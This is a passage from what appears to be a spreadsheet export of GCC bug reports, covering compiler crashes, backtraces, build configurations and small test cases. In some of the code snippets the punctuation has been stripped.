with preprocessed source if appropriate.
See  for instructions.
Preprocessed source attached. Flag -O2 required.</t>
  </si>
  <si>
    <t>GCC-35079</t>
  </si>
  <si>
    <t>[arm] ICE (segfault) with gfortran -O3 -funroll-loops</t>
  </si>
  <si>
    <t>The attached code (from lapack) segfaults gfortran trunk 20080116 with -O3 -funroll-loops succeeds without -funroll-loops.
$ gfortran-4.3  -funroll-loops -save-temps  -O3 -c seispack.f
seispack.f: In function 'invit':
seispack.f:1742: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-16718</t>
  </si>
  <si>
    <t>wrong code-gen for (e1 ?: e2)()</t>
  </si>
  <si>
    <t>On both gcc versions I have available (tageting x86) I get a seg-fault or
illegal-instruction for this program:
int h() {return 17}
int g() {(h ?:0)()} // runs fine as (h ? h : 0)()
int main() {g() return 0}
I believe this happens whenever (e1 ?: e2) is used as a function argument and e1
is non-zero (haven't tested the case where e1 is 0)
gcc versions (perhaps it's only relevant that the target is x86):
swan% gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.3 2.96-113)
swan% gcc -save-temps blah.c
/cygdrive/y/cyclone$gcc -v
Reading specs from /usr/lib/gcc-lib/i686-pc-cygwin/3.2/specs
Configured with: /netrel/src/gcc-3.2-3/configure --enable-languages=cc++f77ja
va --enable-libgcj --enable-threads=posix --with-system-zlib --enable-nls --with
out-included-gettext --enable-interpreter --disable-sjlj-exceptions --disable-ve
rsion-specific-runtime-libs --enable-shared --build=i686-pc-linux --host=i686-pc
-cygwin --target=i686-pc-cygwin --enable-haifa --prefix=/usr --exec-prefix=/usr
--sysconfdir=/etc --libdir=/usr/lib --includedir=/nonexistent/include --libexecd
ir=/usr/sbin
Thread model: posix
gcc version 3.2 20020927 (prerelease)</t>
  </si>
  <si>
    <t>GCC-22058</t>
  </si>
  <si>
    <t>RTL checking failure building libgcc</t>
  </si>
  <si>
    <t>Configured with: /home01/botcazou/cvs/gcc/configure
--prefix=/home01/botcazou/fsf/install_ia64_hp --enable-languages=cc++objc
--enable-checking=assertmiscrtlrtlflag --enable-threads=posix
--with-as=/gnat.home/gnatmail/gnatmail-5_34/install-cobb/bin/as --disable-nls
Thread model: posix
gcc version 4.1.0 20050614 (experimental)
The assembler is the GNU assembler 2.15.
./xgcc -B./ -B/home01/botcazou/fsf/install_ia64_hp/ia64-hp-hpux11.23/bin/
-isystem /home01/botcazou/fsf/install_ia64_hp/ia64-hp-hpux11.23/include -isystem
/home01/botcazou/fsf/install_ia64_hp/ia64-hp-hpux11.23/sys-include
-L/home01/botcazou/fsf/ia64-hp-hpux11.23_gcc/gcc/../ld -O2  -DIN_GCC   
-DUSE_LIBUNWIND_EXCEPTIONS -W -Wall -Wwrite-strings -Wstrict-prototypes
-Wmissing-prototypes -Wold-style-definition  -isystem ./include   -g
-DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -I. -I.
-I/home01/botcazou/cvs/gcc/gcc -I/home01/botcazou/cvs/gcc/gcc/.
-I/home01/botcazou/cvs/gcc/gcc/../include
-I/home01/botcazou/cvs/gcc/gcc/../libcpp/include  -DL_moddi3 -fvisibility=hidden
-DHIDE_EXPORTS -fexceptions -fnon-call-exceptions -c
/home01/botcazou/cvs/gcc/gcc/libgcc2.c -o libgcc/./_moddi3.o
/home01/botcazou/cvs/gcc/gcc/libgcc2.c: In function '__modti3':
/home01/botcazou/cvs/gcc/gcc/libgcc2.c:1084: internal compiler error: RTL check:
expected code 'subreg' have 'post_inc' in mem_loc_descriptor at dwarf2out.c:8639
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gmake[3]: *** [libgcc/./_moddi3.o] Error 1</t>
  </si>
  <si>
    <t>GCC-10674</t>
  </si>
  <si>
    <t>fstream fails to open files in in/out mode if file doesn't exist</t>
  </si>
  <si>
    <t>If one wants to open a file for random access (in/out)
so that the compiler automatically createst the file
when the file doesn't exist one would do
fstream s(test.txtios::in |ios::out)
This will fail if fstream when the file doesn't exist.
It didn't fail with previous compilers (pre 3.x series).
Release:
gcc version 3.4 20030507 (experimental) +  gcc version 3.2.3
Environment:
linux 2.4.18-3 (RedHat 7.3) on 686
How-To-Repeat:
given the file test.cpp below
===================
#include 
using namespace std
int main() {
		fstream s(test.txtios::in | ios::out)
		if(!s.is_open()) cout &lt;&lt; bug!&lt;&lt;endl
		return 0
}
===============
do
g++ -o a.out test.cpp -O2
followed by
./a.out
make sure test.txt doesn't exist and you'll
get 
bug!</t>
  </si>
  <si>
    <t>daniel.lemire</t>
  </si>
  <si>
    <t>GCC-81348</t>
  </si>
  <si>
    <t>PowerPC64: Code built with -mcpu=power9 hits SEGV in RTL split2</t>
  </si>
  <si>
    <t>I hit a SEGV with csmith a cut down test case:
int a
short b
float ***c
void d(void)
{
        int e = 3
        if (a)
                e = b
        ***c = e
}
# gcc -Og -mcpu=power9 crash1b.c
during RTL pass: split2
crash1b.c: In function â€˜dâ€™:
crash1b.c:13:1: internal compiler error: Segmentation fault
 }
 ^
0x109452d3 crash_signal
	../../gcc/gcc/toplev.c:338
0x10440568 df_install_refs
	../../gcc/gcc/df-scan.c:2379
0x10440707 df_refs_add_to_chains
	../../gcc/gcc/df-scan.c:2424
0x10448ed3 df_insn_rescan(rtx_insn*)
	../../gcc/gcc/df-scan.c:1091
0x104d8387 emit_insn_after_1
	../../gcc/gcc/emit-rtl.c:4492
0x104d8387 emit_pattern_after_noloc
	../../gcc/gcc/emit-rtl.c:4541
0x104d8603 emit_pattern_after_setloc
	../../gcc/gcc/emit-rtl.c:4694
0x104d9a77 emit_insn_after_setloc(rtx_def* rtx_def* int)
	../../gcc/gcc/emit-rtl.c:4739
0x104d9a77 try_split(rtx_def* rtx_insn* int)
	../../gcc/gcc/emit-rtl.c:3839
0x10871d97 split_insn
	../../gcc/gcc/recog.c:2889
0x10878107 split_all_insns()
	../../gcc/gcc/recog.c:2978
0x10878177 rest_of_handle_split_before_sched2
	../../gcc/gcc/recog.c:4018
0x10878177 execute
	../../gcc/gcc/recog.c:4057</t>
  </si>
  <si>
    <t>GCC-20862</t>
  </si>
  <si>
    <t>format statement outside procedure</t>
  </si>
  <si>
    <t>The following is non-standard and the compiler should probably generate a
warning/error with '-pedantic -std=f95'
MODULE TT
10 FORMAT(I8)
END MODULE TT
END</t>
  </si>
  <si>
    <t>GCC-30917</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE with friend in local class (to a function)</t>
  </si>
  <si>
    <t>Testcase:
 unsigned count() {
  class QGListIterator {
 friend class QGList
  QGListIterator( const QGList 
}
}
--------
I think this is valid code.</t>
  </si>
  <si>
    <t>GCC-81668</t>
  </si>
  <si>
    <t>LTO ODR warnings are not helpful</t>
  </si>
  <si>
    <t>Hi
I'm trying to make MySQL compile with LTO. There are a lot of ODR violations (which I'm trying to fix) but sometimes the warnings are too vague to give any real information. An example:
[797/1336] Building CXX object unittest/gunit/CMakeFiles/merge_large_tests-t.dir/opt_ref-t.cc.o
In file included from ../include/my_byteorder.h:53:0
                 from ../include/m_ctype.h:29
                 from ../include/my_compare.h:25
                 from ../sql/field.h:22
                 from ../unittest/gunit/fake_table.h:27
                 from ../unittest/gunit/opt_ref-t.cc:23:
../include/template_utils.h: In instantiation of 'T pointer_cast(void*) [with T = unsigned char* const]':
../sql/sql_optimizer.cc:9901:60:   required from here
../include/template_utils.h:70:10: warning: type qualifiers ignored on cast result type [-Wignored-qualifiers]
   return static_cast(p)
          ^~~~~~~~~~~~~~~~~
[852/1336] Linking CXX executable runtime_output_directory/pfs-t
../storage/perfschema/pfs.h:72:40: warning: type of 'THR_PFS_contexts' does not match original declaration [-Wlto-type-mismatch]
 extern thread_local PFS_table_context *THR_PFS_contexts[THR_PFS_NUM_KEYS]
                                        ^
../storage/perfschema/pfs.cc:2072:33: note: 'THR_PFS_contexts' was previously declared here
 thread_local PFS_table_context *THR_PFS_contexts[THR_PFS_NUM_KEYS]
                                 ^
../storage/perfschema/pfs.cc:2072:33: note: code may be misoptimized unless -fno-strict-aliasing is used
[854/1336] Linking CXX executable runtime_output_directory/pfs_instr-t
../storage/perfschema/pfs.h:72:40: warning: type of 'THR_PFS_contexts' does not match original declaration [-Wlto-type-mismatch]
 extern thread_local PFS_table_context *THR_PFS_contexts[THR_PFS_NUM_KEYS]
                                        ^
../storage/perfschema/pfs.cc:2072:33: note: 'THR_PFS_contexts' was previously declared here
 thread_local PFS_table_context *THR_PFS_contexts[THR_PFS_NUM_KEYS]
                                 ^
../storage/perfschema/pfs.cc:2072:33: note: code may be misoptimized unless -fno-strict-aliasing is used
[855/1336] Linking CXX executable runtime_output_directory/pfs_instr_class-t
../storage/perfschema/pfs.h:72:40: warning: type of 'THR_PFS_contexts' does not match original declaration [-Wlto-type-mismatch]
 extern thread_local PFS_table_context *THR_PFS_contexts[THR_PFS_NUM_KEYS]
                                        ^
../storage/perfschema/pfs.cc:2072:33: note: 'THR_PFS_contexts' was previously declared here
 thread_local PFS_table_context *THR_PFS_contexts[THR_PFS_NUM_KEYS]
                                 ^
../storage/perfschema/pfs.cc:2072:33: note: code may be misoptimized unless -fno-strict-aliasing is used
[856/1336] Linking CXX executable runtime_output_directory/pfs_account-oom-t
../storage/perfschema/pfs.h:72:40: warning: type of 'THR_PFS_contexts' does not match original declaration [-Wlto-type-mismatch]
 extern thread_local PFS_table_context *THR_PFS_contexts[THR_PFS_NUM_KEYS]
                                        ^
../storage/perfschema/pfs.cc:2072:33: note: 'THR_PFS_contexts' was previously declared here
 thread_local PFS_table_context *THR_PFS_contexts[THR_PFS_NUM_KEYS]
                                 ^
../storage/perfschema/pfs.cc:2072:33: note: code may be misoptimized unless -fno-strict-aliasing is used
[857/1336] Linking CXX executable runtime_output_directory/pfs_host-oom-t
../storage/perfschema/pfs.h:72:40: warning: type of 'THR_PFS_contexts' does not match original declaration [-Wlto-type-mismatch]
 extern thread_local PFS_table_context *THR_PFS_contexts[THR_PFS_NUM_KEYS]
                                        ^
../storage/perfschema/pfs.cc:2072:33: note: 'THR_PFS_contexts' was previously declared here
 thread_local PFS_table_context *THR_PFS_contexts[THR_PFS_NUM_KEYS]
                                 ^
../storage/perfschema/pfs.cc:2072:33: note: code may be misoptimized unless -fno-strict-aliasing is used
[858/1336] Linking CXX executable runtime_output_directory/pfs_user-oom-t
../storage/perfschema/pfs.h:72:40: warning: type of 'THR_PFS_contexts' does not match original declaration [-Wlto-type-mismatch]
 extern thread_local PFS_table_context *THR_PFS_contexts[THR_PFS_NUM_KEYS]
                                        ^
../storage/perfschema/pfs.cc:2072:33: note: 'THR_PFS_contexts' was previously declared here
 thread_local PFS_table_context *THR_PFS_contexts[THR_PFS_NUM_KEYS]
                                 ^
../storage/perfschema/pfs.cc:2072:33: note: code may be misoptimized unless -fno-strict-aliasing is used
[859/1336] Linking CXX executable runtime_output_directory/pfs_instr_class-oom-t
../storage/perfschema/pfs.h:72:40: warning: type of 'THR_PFS_contexts' does not match original declaration [-Wlto-type-mismatch]
 extern thread_local PFS_table_context *THR_PFS_contexts[THR_PFS_NUM_KEYS]
                                        ^
../storage/perfschema/pfs.cc:2072:33: note: 'THR_PFS_contexts' was previously declared here
 thread_local PFS_table_context *THR_PFS_contexts[THR_PFS_NUM_KEYS]
                                 ^
../storage/perfschema/pfs.cc:2072:33: note: code may be misoptimized unless -fno-strict-aliasing is used
[860/1336] Linking CXX executable runtime_output_directory/pfs_instr-oom-t
../storage/perfschema/pfs.h:72:40: warning: type of 'THR_PFS_contexts' does not match original declaration [-Wlto-type-mismatch]
 extern thread_local PFS_table_context *THR_PFS_contexts[THR_PFS_NUM_KEYS]
                                        ^
../storage/perfschema/pfs.cc:2072:33: note: 'THR_PFS_contexts' was previously declared here
 thread_local PFS_table_context *THR_PFS_contexts[THR_PFS_NUM_KEYS]
                                 ^
../storage/perfschema/pfs.cc:2072:33: note: code may be misoptimized unless -fno-strict-aliasing is used
From what I can see class PFS_table_context and THR_PFS_NUM_KEYS all have the same definition in all translation units so it's not clear to me at all what it's complaining about. I'd try to make a minimal example but I can't even figure out which .o files are involved (it would certainly help to know there are hundreds or thousands of them being linked together).
Similarly I get these warnings:
fts0pars.y:62:0: note: a field with different name is defined in another translation unit
../include/violite.h:288:8: warning: type â€˜struct st_vioâ€™ violates the C++ One Definition Rule [-Wodr]
 struct st_vio
        ^
../include/violite.h:288:0: note: a different type is defined in another translation unit
 struct st_vio
../include/violite.h:339:46: note: the first difference of corresponding definitions is field â€˜viodeleteâ€™
   void    (*viodelete)(MYSQL_VIO)= { nullptr }
                                              ^
../include/violite.h:339:0: note: a field of same name but different type is defined in another translation unit
   void    (*viodelete)(MYSQL_VIO)= { nullptr }
Near as I can see there's no difference here. MYSQL_VIO is a macro to Vio* in all translation units as far as I can see. But it's impossible for me to say if the warning is wrong or if the code is wrong.
This is both with GCC 7.1.0 and a recent snapshot:
Using built-in specs.
COLLECT_GCC=/usr/lib/gcc-snapshot/bin/g++
COLLECT_LTO_WRAPPER=/usr/lib/gcc-snapshot/libexec/gcc/x86_64-linux-gnu/8/lto-wrapper
OFFLOAD_TARGET_NAMES=nvptx-none
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 20170618-1' --with-bugurl=file:///usr/share/doc/gcc-snapshot/README.Bugs --enable-languages=cadac++gobrigfortranobjcobj-c++ --prefix=/usr/lib/gcc-snapshot --with-gcc-major-version-only --program-prefix= --enable-shared --enable-linker-build-id --disable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --with-default-libstdcxx-abi=new --enable-gnu-unique-object --disable-vtable-verify --enable-libmpx --enable-plugin --with-system-zlib --enable-objc-gc=auto --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-offload-targets=nvptx-none --enable-checking=yes --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 8.0.0 20170618 (experimental) [trunk revision 249349] (Debian 20170618-1)</t>
  </si>
  <si>
    <t>steinar+gcc</t>
  </si>
  <si>
    <t>GCC-32103</t>
  </si>
  <si>
    <t>Module with equivalence draws unsatisfied reference</t>
  </si>
  <si>
    <t>Given this eq-mod.f90
module aap
   real a(5)
   real b(3)
   equivalence (a(3)b(1))
end module aap
and the following main program eq-main.f90
use aap only : b
print*b
end
draws when compiling with GNU Fortran (GCC) 4.2.1 20070523 (prerelease)
as follows:
toon@laptop:~/g95-bugs$ /usr/rel/bin/gfortran -c eq-mod.f90
toon@laptop:~/g95-bugs$ /usr/rel/bin/gfortran -c eq-main.f90
toon@laptop:~/g95-bugs$ /usr/rel/bin/gfortran -static eq-main.o eq-mod.o
eq-main.o: In function `MAIN__':
eq-main.f90:(.text+0x78): undefined reference to `__aap(bool)'
collect2: ld returned 1 exit status
The (bool) is a red herring caused by collect2's helpful reinterpretation of the following external reference:
toon@laptop:~/g95-bugs$ nm eq-main.o
                 U __aap__b
...</t>
  </si>
  <si>
    <t>GCC-71571</t>
  </si>
  <si>
    <t>[CRIS] Multiple inheritance non-virtual PIC thunk causes crash</t>
  </si>
  <si>
    <t>Created attachment 38719
Add nop for ba (branch) delay slot in PIC multiple inheritance thunk
The jump to the primary function in the generated non-virtual thunk for the CRIS platform is missing the delay slot instruction (an instruction following the jump that is executed before it) in PIC mode so it runs the following instruction in the text segment instead. (This following instruction is frequently the next function's preamble usually a sub from $sp which causes a crash in a subsequent return or other stack lookup.)
We initially saw this problem on a vendor-provided (Axis) GCC 4.3.1 but it repros on current SVN (r237536 when I checked it out). Details of GCC build:
	gcc version 7.0.0 20160616 (experimental) (GCC)
	Host: x86_64-unknown-linux-gnu
	Target: crisv32-axis-linux-gnu
	Configured with: ../gcc-svn/configure --prefix=/opt/cross --target=crisv32-axis-linux-gnu --enable-languages=cc++ --disable-multilib
The build command-line is: /opt/cross/bin/crisv32-axis-linux-gnu-g++ -fPIC -save-temps -o test main.cpp (substitute main.ii)
I am attaching:
 * a repro program main.ii after reduction it (probably) doesn't crash but the thunk with branch (ba) without a delay-slot instruction can be seen in the assembly
 * a slightly larger repro crash.ii that reliably crashes (due to an $sp-modifying instruction following the branch) this requires additional g++ options -O2 -fno-inline (the -O2 to eliminate a dword stored in memory after the ba instruction and -fno-inline to prevent the thunk from being an inline copy of the function it would jump to)
 * a patch to fix the problem.
Runs of make check-gcc-c++ RUNTESTFLAGS=--target_board=cris-sim with/without the fix do not differ in passes/failures. I would like to add a test for this issue but am unsure as to the correct way of doing so crash.ii could be used in an execute test or is checking the output assembly better or something else?</t>
  </si>
  <si>
    <t>GCC-51704</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: vector VEC(vec_void_pbase) index domain error in vinfo_for_stmt at tree-vectorizer.h:620 with -O3 -fno-tree-copy-prop -fno-tree-fre</t>
  </si>
  <si>
    <t>Created attachment 26199
autoreduced testcase
Compiler output:
$ gcc -O3 -fno-tree-copy-prop -fno-tree-fre testsuite/gfortran.dg/inline_sum_1.f90
testsuite/gfortran.dg/inline_sum_1.f90: In function 'MAIN__':
testsuite/gfortran.dg/inline_sum_1.f90:14:0: internal compiler error: vector VEC(vec_void_pbase) index domain error in vinfo_for_stmt at tree-vectorizer.h:620
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) bt
#0  internal_error (gmsgid=0x1526a70 vector %s %s domain error in %s at %s:%u) at /mnt/svn/gcc-trunk/gcc/diagnostic.c:839
#1  0x00000000012226c9 in vec_assert_fail (op=0x14e80a0 index struct_name=0x132b3ef VEC(vec_void_pbase) file= line=620 
    function=0x132ef3a vinfo_for_stmt) at /mnt/svn/gcc-trunk/gcc/vec.c:517
#2  0x0000000000bfdff7 in VEC_vec_void_p_base_index (ix_= vec_= file_= line_= 
    function_=) at /mnt/svn/gcc-trunk/gcc/tree-vectorizer.h:603
#3  vinfo_for_stmt (stmt=) at /mnt/svn/gcc-trunk/gcc/tree-vectorizer.h:620
#4  vect_detect_hybrid_slp_stmts (node=0x1b217d0) at /mnt/svn/gcc-trunk/gcc/tree-vect-slp.c:1740
#5  0x0000000000bfe61e in vect_detect_hybrid_slp (loop_vinfo=) at /mnt/svn/gcc-trunk/gcc/tree-vect-slp.c:1770
#6  0x0000000000bf3b55 in vect_analyze_loop_2 (loop_vinfo=) at /mnt/svn/gcc-trunk/gcc/tree-vect-loop.c:1610
#7  vect_analyze_loop (loop=0x7ffff59d4550) at /mnt/svn/gcc-trunk/gcc/tree-vect-loop.c:1667
#8  0x0000000000c02ef7 in vectorize_loops () at /mnt/svn/gcc-trunk/gcc/tree-vectorizer.c:203
#9  0x0000000000960335 in execute_one_pass (pass=0x1842ba0) at /mnt/svn/gcc-trunk/gcc/passes.c:2080
#10 0x00000000009606d5 in execute_pass_list (pass=0x1842ba0) at /mnt/svn/gcc-trunk/gcc/passes.c:2135
#11 0x00000000009606e7 in execute_pass_list (pass=0x1842d80) at /mnt/svn/gcc-trunk/gcc/passes.c:2136
#12 0x00000000009606e7 in execute_pass_list (pass=0x1842000) at /mnt/svn/gcc-trunk/gcc/passes.c:2136
#13 0x0000000000ac16ae in tree_rest_of_compilation (fndecl=0x7ffff5bb5100) at /mnt/svn/gcc-trunk/gcc/tree-optimize.c:421
#14 0x000000000071715a in cgraph_expand_function (node=0x7ffff5a95c60) at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1818
#15 0x0000000000718efc in cgraph_expand_all_functions () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1885
#16 cgraph_optimize () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:2198
#17 0x000000000071966a in cgraph_finalize_compilation_unit () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1327
#18 0x000000000090aa8d in write_global_declarations () at /mnt/svn/gcc-trunk/gcc/langhooks.c:303
#19 0x0000000000a54dec in compile_file () at /mnt/svn/gcc-trunk/gcc/toplev.c:573
#20 do_compile () at /mnt/svn/gcc-trunk/gcc/toplev.c:1935
#21 toplev_main (argc=16 argv=0x7fffffffd928) at /mnt/svn/gcc-trunk/gcc/toplev.c:2011
#22 0x00007ffff61cc09d in __libc_start_main () from /lib64/libc.so.6
#23 0x00000000005833f1 in _start ()
Tested revisions:
r182703 - crash
4.6 r180325 - OK</t>
  </si>
  <si>
    <t>GCC-77773</t>
  </si>
  <si>
    <t>[6 Regression] Segfault when compiling __simd64_float16_t using arm-none-eabi-g++ with debug information</t>
  </si>
  <si>
    <t>Hello
When compiling the following:
$ cat t.c
typedef __simd64_float16_t float16x4_t
with:
$ arm-none-eabi-g++ -S t.c -mfloat-abi=hard -march=armv7-a -g
t.c:1:28: internal compiler error: Segmentation fault
0xd33a1f crash_signal
        src/gcc/gcc/toplev.c:336
0x881b8f tree_class_check
        src/gcc/gcc/tree.h:3148
0x881b8f c_pretty_printer::simple_type_specifier(tree_node*)
        src/gcc/gcc/c-family/c-pretty-print.c:351
0x7ce46e cxx_pretty_printer::simple_type_specifier(tree_node*)
        src/gcc/gcc/cp/cxx-pretty-print.c:1324
0x884dec pp_c_specifier_qualifier_list(c_pretty_printer* tree_node*)
        src/gcc/gcc/c-family/c-pretty-print.c:478
0x884dde pp_c_specifier_qualifier_list(c_pretty_printer* tree_node*)
        src/gcc/gcc/c-family/c-pretty-print.c:474
0x7ccbe2 pp_cxx_type_specifier_seq
        src/gcc/gcc/cp/cxx-pretty-print.c:1379
0x6b4cd4 dump_type
        src/gcc/gcc/cp/error.c:467
0x6be905 dump_type_prefix
        src/gcc/gcc/cp/error.c:811
0x6b26b2 dump_simple_decl
        src/gcc/gcc/cp/error.c:970
0x6b2e00 dump_decl
        src/gcc/gcc/cp/error.c:1057
0x6beaf1 decl_as_string(tree_node* int)
        src/gcc/gcc/cp/error.c:2882
0x6beb1f decl_as_dwarf_string(tree_node* int)
        src/gcc/gcc/cp/error.c:2871
0x59a171 cxx_dwarf_name
        src/gcc/gcc/cp/cp-lang.c:119
0x97f8be type_tag
        src/gcc/gcc/dwarf2out.c:19191
0x9a1369 gen_array_type_die
        src/gcc/gcc/dwarf2out.c:19367
0x9a1369 gen_type_die_with_usage
        src/gcc/gcc/dwarf2out.c:23080
0x9a1c8b gen_type_die
        src/gcc/gcc/dwarf2out.c:23142
0x9ab9d7 modified_type_die
        src/gcc/gcc/dwarf2out.c:11469
0x9abf9c add_type_attribute
        src/gcc/gcc/dwarf2out.c:19123
Removing -g makes it compile without errors.</t>
  </si>
  <si>
    <t>avieira</t>
  </si>
  <si>
    <t>GCC-64338</t>
  </si>
  <si>
    <t>[5 Regression] ICE in swap_condition at jump.c:628</t>
  </si>
  <si>
    <t>Created attachment 34295
preprocessed source
&gt; ./cc1plus  -quiet KDChartCartesianAxis.ii  -quiet -mtune=generic -march=i586 -g -O2 -fomit-frame-pointer -fno-exceptions -fno-check-new  -fno-threadsafe-statics -fvisibility=hidden -fvisibility-inlines-hidden -fPIC  -m32
/home/abuild/rpmbuild/BUILD/calligra-2.8.6/3rdparty/kdchart/src/KDChartCartesianAxis.cpp: In member function 'virtual void KDChart::CartesianAxis::paintCtx(KDChart::PaintContext*)':
/home/abuild/rpmbuild/BUILD/calligra-2.8.6/3rdparty/kdchart/src/KDChartCartesianAxis.cpp:1426:1: internal compiler error: in swap_condition at jump.c:628
0xda1ad1 swap_condition(rtx_code)
        /space/rguenther/src/svn/trunk2/gcc/jump.c:628
0xb7664d emit_store_flag_1
        /space/rguenther/src/svn/trunk2/gcc/expmed.c:5227
0xb76d47 emit_store_flag(rtx_def* rtx_code rtx_def* rtx_def* machine_mode int int)
        /space/rguenther/src/svn/trunk2/gcc/expmed.c:5434
0x1303358 ix86_expand_int_movcc(rtx_def**)
        /space/rguenther/src/svn/trunk2/gcc/config/i386/i386.c:20929
0x1303ab0 ix86_expand_int_movcc(rtx_def**)
        /space/rguenther/src/svn/trunk2/gcc/config/i386/i386.c:21098
0x144a08b gen_movqicc(rtx_def* rtx_def* rtx_def* rtx_def*)
        /space/rguenther/src/svn/trunk2/gcc/config/i386/i386.md:16600
0xe547c8 insn_gen_fn::operator()(rtx_def* rtx_def* rtx_def* rtx_def*) const
        /space/rguenther/src/svn/trunk2/gcc/recog.h:305
0xe53741 maybe_gen_insn(insn_code unsigned int expand_operand*)
        /space/rguenther/src/svn/trunk2/gcc/optabs.c:8377
0xe53a3e maybe_expand_insn(insn_code unsigned int expand_operand*)
        /space/rguenther/src/svn/trunk2/gcc/optabs.c:8407
0xe4a8b7 emit_conditional_move(rtx_def* rtx_code rtx_def* rtx_def* machine_mode rtx_def* rtx_def* machine_mode int)
        /space/rguenther/src/svn/trunk2/gcc/optabs.c:4614
0x17f2c00 noce_emit_cmove
        /space/rguenther/src/svn/trunk2/gcc/ifcvt.c:1498
0x17f31c1 noce_try_cmove
        /space/rguenther/src/svn/trunk2/gcc/ifcvt.c:1578
0x17f5d73 noce_process_if_block
        /space/rguenther/src/svn/trunk2/gcc/ifcvt.c:2754
0x17f6fa6 noce_find_if_block
        /space/rguenther/src/svn/trunk2/gcc/ifcvt.c:3214
0x17f7651 find_if_header
        /space/rguenther/src/svn/trunk2/gcc/ifcvt.c:3423
0x17fa187 if_convert
        /space/rguenther/src/svn/trunk2/gcc/ifcvt.c:4572
0x17fa4bd execute
        /space/rguenther/src/svn/trunk2/gcc/ifcvt.c:4718
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-30992</t>
  </si>
  <si>
    <t>Scaling error in decimal floating-point arithmetic blows conversions to integers</t>
  </si>
  <si>
    <t>The function DFP_TO_INT() in gcc/config/dfp-bit.c has the job of converting
decimal floating point values to integers.  It does this by calling the
decNumberFromString() function from the IBM decnumber library but with an
incorrect argument.  Fortunately the patch is just one character:
% diff -c gcc-4.3-20070209/gcc/config/dfp-bit.c /local/build/gcc/gcc-4.3-20070209/gcc/config
*** gcc-4.3-20070209/gcc/config/dfp-bit.c       Mon Jan 29 16:01:35 2007
--- /local/build/gcc/gcc-4.3-20070209/gcc/config/dfp-bit.c      Thu Feb 15 12:41:12 2007
***************
*** 450456 ****
    /* Rescale if the exponent is less than zero.  */
    decNumberToIntegralValue (
    /* Get a value to use for the quantize call.  */
!   decNumberFromString (
    /* Force the exponent to zero.  */
    decNumberQuantize (
    /* Get a string which at this point will not include an exponent.  */
--- 450456 ----
    /* Rescale if the exponent is less than zero.  */
    decNumberToIntegralValue (
    /* Get a value to use for the quantize call.  */
!   decNumberFromString (
    /* Force the exponent to zero.  */
    decNumberQuantize (
    /* Get a string which at this point will not include an exponent.  */
Without this patch the range of numbers that can be correctly converted
to integers is sharply reduced: most conversions of large values are
wrong.  For example the value x = 1048576.0DF is exactly representable
as a _Decimal32 value and as a 32-bit int but the bad code converts it 
to an int value of 2147483647 and a long int value of 9223372036854775807.  With the patch integer conversions are now correct for all floating-point values for which exact integer counterparts exist.
The bug exists in all versions of dfp-bit.c in gcc-4.2 and gcc-4.3
distributions.
As an aside I now have a complete C99 library for decimal arithmetic
working under gcc-4.2 and gcc-4.3 on AMD64 thanks to the prototype
support for decimal arithmetic in gcc.  I look forward to the decimal
support working on other platforms.</t>
  </si>
  <si>
    <t>GCC-50718</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] ICE (fold_convert) with -fcheck=pointer</t>
  </si>
  <si>
    <t>FGSL version 0.9.3 from http://www.lrz.de/services/software/mathematik/gsl/fortran/
With gfortran 4.7 and with gfortran 4.6.1 20110801 (rev. 177033) I get:
  api/siman.finc:99:0: internal compiler error: in fold_convert_loc
                       at fold-const.c:2026
It works with 4.5.3 20110428 [rev. 173117].
#9  0x0000000000aeefab in build_array_type_1 (elt_type=0x2aaaaab48348
    index_type=0x2aaaacf0d7e0 shared=true) at /home/tob/projects/gcc-git/gcc/gcc/tree.c:7373
#10 0x0000000000604285 in gfc_get_character_type_len_for_eltype (eltype=0x2aaaaab48348
    len=) at /home/tob/projects/gcc-git/gcc/gcc/fortran/trans-types.c:977
#11 0x00000000006089a9 in gfc_sym_type (sym=0x2ad5780)
    at /home/tob/projects/gcc-git/gcc/gcc/fortran/trans-types.c:2050
#12 0x00000000005c112c in create_function_arglist (sym=0x1bcb3d0)
    at /home/tob/projects/gcc-git/gcc/gcc/fortran/trans-decl.c:2067</t>
  </si>
  <si>
    <t>GCC-43636</t>
  </si>
  <si>
    <t>[4.5/4.6 Regression] ICE in extract_insn at recog.c:2103</t>
  </si>
  <si>
    <t>/usr/lib/gcc/s390-suse-linux/4.5/cc1 -fpreprocessed gengtype-yacc.i -quiet -dumpbase gengtype-yacc.c -march=z900 -mtune=z9-109 -m31 -mesa -auxbase-strip gengtype-yacc.o -g -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -pedantic -Wno-long-long -version -o gengtype-yacc.s
GNU C (SUSE Linux) version 4.5.0 20100331 (experimental) [trunk revision 157870] (s390-suse-linux)
        compiled by GNU C version 4.5.0 20100331 (experimental) [trunk revision 157870] GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU C (SUSE Linux) version 4.5.0 20100331 (experimental) [trunk revision 157870] (s390-suse-linux)
        compiled by GNU C version 4.5.0 20100331 (experimental) [trunk revision 157870] GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 102c29ff3de51fc55ac98064415595e0
